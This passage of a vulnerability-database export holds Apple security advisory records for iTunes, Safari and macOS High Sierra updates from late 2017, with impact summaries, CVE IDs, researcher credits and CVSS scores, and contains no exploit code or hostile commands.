Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit**\n\nAvailable for: Windows 7 and later \n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-18T05:09:28", "title": "About the security content of iTunes 12.7.2 for Windows - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13864", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7151", "CVE-2017-7172", "CVE-2017-7165", "CVE-2017-15422", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-10-18T05:09:28", "id": "APPLE:HT208326", "href": "https://support.apple.com/kb/HT208326", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:44:24", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Safari 11.0.2\n\nReleased December 6, 2017\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit Web Inspector**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.\n\nCVE-2017-7161: Mitin Svyat\n\nEntry added January 10, 2018\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n", "edition": 3, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-09T04:06:11", "title": "About the security content of Safari 11.0.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-7161", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-7165", "CVE-2017-13870", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13884", "CVE-2017-7157", "CVE-2017-13885"], "modified": "2018-04-09T04:06:11", "id": "APPLE:HT208324", "href": "https://support.apple.com/kb/HT208324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T17:00:36", "description": "# About the security content of Safari 11.0.2\n\nThis document describes the security content of Safari 11.0.2.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Safari 11.0.2\n\nReleased December 6, 2017\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13885: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-7165: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-13884: 360 Security working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Visiting a malicious website may lead to user interface spoofing\n\nDescription: Redirect responses to 401 Unauthorized may allow a malicious website to incorrectly display the lock icon on mixed content. This issue was addressed through improved URL display logic.\n\nCVE-2017-7153: Jerry Decime\n\nEntry added January 11, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2017-7156: Yuan Deng of Ant-financial Light-Year Security Lab\n\nCVE-2017-7157: an anonymous researcher\n\nCVE-2017-13856: Jeonghoon Shin\n\nCVE-2017-13870: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-7160: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nCVE-2017-13866: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**WebKit Web Inspector**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.\n\nCVE-2017-7161: Mitin Svyat\n\nEntry added January 10, 2018\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**WebKit**\n\nWe would like to acknowledge Yi\u011fit Can YILMAZ (@yilmazcanyigit) and Abhinash Jain (@abhinashjain) researcher for their assistance.\n\nEntry added February 14, 2018, updated April 9, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: April 09, 2018\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-06T00:00:00", "type": "apple", "title": "About the security content of Safari 11.0.2", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13870", "CVE-2017-13884", "CVE-2017-13885", "CVE-2017-7153", "CVE-2017-7156", "CVE-2017-7157", "CVE-2017-7160", "CVE-2017-7161", "CVE-2017-7165"], "modified": "2017-12-06T00:00:00", "id": "APPLE:05865687B681A94EDACF5CD84F56F0EF", "href": "https://support.apple.com/kb/HT208324", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-24T20:41:48", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. \n\nCVE-2017-13892: Ryan Manly of Glenbrook High School District 225\n\nEntry added October 18, 2018\n\n**CoreAnimation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7171: 360 Security working with Trend Micro's Zero Day Initiative, and Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**CoreFoundation**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-7151: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**curl**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Malicious FTP servers may be able to cause the client to read out-of-bounds memory\n\nDescription: An out-of-bounds read issue existed in the FTP PWD response parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-1000254: Max Dymond\n\n**Directory Utility**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nNot impacted: macOS Sierra 10.12.6 and earlier \n\nImpact: An attacker may be able to bypass administrator authentication without supplying the administrator\u2019s password\n\nDescription: A logic error existed in the validation of credentials. This was addressed with improved credential validation.\n\nCVE-2017-13872\n\n**ICU**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-15422: Yuan Deng of Ant-financial Light-Year Security Lab\n\nEntry added March 14, 2018\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13883: Yu Wang of Didi Research America\n\nCVE-2017-7163: Yu Wang of Didi Research America\n\nCVE-2017-7155: Yu Wang of Didi Research America\n\nEntry updated December 21, 2017 \n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An out-of-bounds read issue existed that led to the disclosure of kernel memory. This was addressed through improved input validation.\n\nCVE-2017-13878: Ian Beer of Google Project Zero\n\n**Intel Graphics Driver**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An out-of-bounds read was addressed through improved bounds checking.\n\nCVE-2017-13875: Ian Beer of Google Project Zero\n\n**IOAcceleratorFamily**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7159: found by IMF developed by HyungSeok Han (daramg.gift) of SoftSec, KAIST (softsec.kaist.ac.kr)\n\nEntry updated December 21, 2017 \n\n**IOKit**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-13848: Alex Plaskett of MWR InfoSecurity\n\nCVE-2017-13858: an anonymous researcher\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: Multiple memory corruption issues were addressed through improved state management.\n\nCVE-2017-13847: Ian Beer of Google Project Zero\n\n**IOKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7162: Tencent Keen Security Lab (@keen_lab) working with Trend Micro's Zero Day Initiative\n\nEntry updated January 10, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13904: Kevin Backhouse of Semmle Ltd.\n\nEntry added February 14, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read kernel memory (Meltdown)\n\nDescription: Systems with microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized disclosure of information to an attacker with local user access via a side-channel analysis of the data cache.\n\nCVE-2017-5754: Jann Horn of Google Project Zero; Moritz Lipp of Graz University of Technology; Michael Schwarz of Graz University of Technology; Daniel Gruss of Graz University of Technology; Thomas Prescher of Cyberus Technology GmbH; Werner Haas of Cyberus Technology GmbH; Stefan Mangard of Graz University of Technology; Paul Kocher; Daniel Genkin of University of Pennsylvania and University of Maryland; Yuval Yarom of University of Adelaide and Data61; and Mike Hamburg of Rambus (Cryptography Research Division)\n\nEntry updated January 5, 2018\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13862: Apple\n\nCVE-2017-13867: Ian Beer of Google Project Zero\n\nEntry updated December 21, 2017 \n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read was addressed with improved bounds checking.\n\nCVE-2017-7173: Brandon Azad\n\nEntry updated January 11, 2018\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-13876: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2017-13855: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13865: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: A validation issue was addressed with improved input sanitization.\n\nCVE-2017-13868: Brandon Azad\n\nCVE-2017-13869: Jann Horn of Google Project Zero\n\n**Kernel**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A local user may be able to cause unexpected system termination or read kernel memory\n\nDescription: An input validation issue existed in the kernel. This issue was addressed through improved input validation.\n\nCVE-2017-7154: Jann Horn of Google Project Zero\n\nEntry added December 21, 2017\n\n**Mail**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: A S/MIME encrypted email may be inadvertently sent unencrypted if the receiver's S/MIME certificate is not installed\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2017-13871: Lukas Pitschl of GPGTools\n\nEntry updated December 21, 2017\n\n**Mail Drafts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An attacker with a privileged network position may be able to intercept mail\n\nDescription: An encryption issue existed with S/MIME credentials. The issue was addressed with additional checks and user control.\n\nCVE-2017-13860: Michael Weishaar of INNEO Solutions GmbH\n\nEntry updated January 10, 2018\n\n**OpenSSL**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to read restricted memory\n\nDescription: An out-of-bounds read issue existed in X.509 IPAddressFamily parsing. This issue was addressed with improved bounds checking.\n\nCVE-2017-3735: found by OSS-Fuzz\n\n**Perl**\n\nAvailable for: macOS Sierra 10.12.6\n\nImpact: This bugs can allow remote attackers to cause a denial of service\n\nDescription: Public CVE-2017-12837 was addressed by updating the function in Perl 5.18\n\nCVE-2017-12837: Jakub Wilk\n\nEntry added October 18, 2018\n\n**Screen Sharing Server**\n\nAvailable for: macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: A user with screen sharing access may be able to access any file readable by root\n\nDescription: A permissions issue existed in the handling of screen sharing sessions. This issue was addressed with improved permissions handling.\n\nCVE-2017-7158: Trevor Jacques of Toronto\n\nEntry updated December 21, 2017\n\n**SIP**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A configuration issue was addressed with additional restrictions.\n\nCVE-2017-13911: Timothy Perfitt of Twocanoes Software\n\nEntry updated August 8, 2018, updated September 25, 2018\n\n**Wi-Fi**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An unprivileged user may change Wi-Fi system parameters leading to denial of service\n\nDescription: An access issue existed with privileged Wi-Fi system configuration. This issue was addressed with additional restrictions.\n\nCVE-2017-13886: David Kreitschmann and Matthias Schulz of Secure Mobile Networking Lab at TU Darmstadt\n\nEntry added May 2, 2018\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## Additional recognition\n\n**Mail**\n\nWe would like to acknowledge Jon Bottarini of HackerOne for their assistance.\n\nEntry added February 6, 2020\n", "edition": 4, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-07-27T08:21:38", "title": "About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2020-07-27T08:21:38", "id": "APPLE:HT208331", "href": "https://support.apple.com/kb/HT208331", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-07T01:01:29", "description": "# About the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nThis document describes the security content of macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n![](/library/content/dam/edam/applecare/images/en_US/mac_apps/itunes/divider.png)\n\n## macOS High Sierra 10.13.2, Security Update 2017-002 Sierra, and Security Update 2017-005 El Capitan\n\nReleased December 6, 2017\n\n**APFS**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: APFS encryption keys may not be securely deleted after hibernating\n\nDescription: A logic issue existed in APFS when deleting keys during hibernation. This was addressed with improved state management.\n\nCVE-2017-13887: David Ryskalczyk\n\nEntry added June 21, 2018\n\n**apache**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: Processing a maliciously crafted Apache configuration directive may result in the disclosure of process memory\n\nDescription: Multiple issues were addressed by updating to version 2.4.28.\n\nCVE-2017-9798: Hanno B\u00f6ck\n\nEntry updated December 18, 2018\n\n**Auto Unlock**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A race condition was addressed with additional validation.\n\nCVE-2017-13905: Samuel Gro\u00df (@5aelo)\n\nEntry added October 18, 2018\n\n**CFNetwork Session**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, macOS High Sierra 10.13.1\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2017-7172: Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\nEntry added January 22, 2018\n\n**Contacts**\n\nAvailable for: macOS High Sierra 10.13.1\n\nImpact: Sharing contact information may lead to unexpected data sharing\n\nDescription: An issue existed in the handling of Contact sharing. This issue was addressed with improved handling of user information. \n\nCVE-2017-13892: 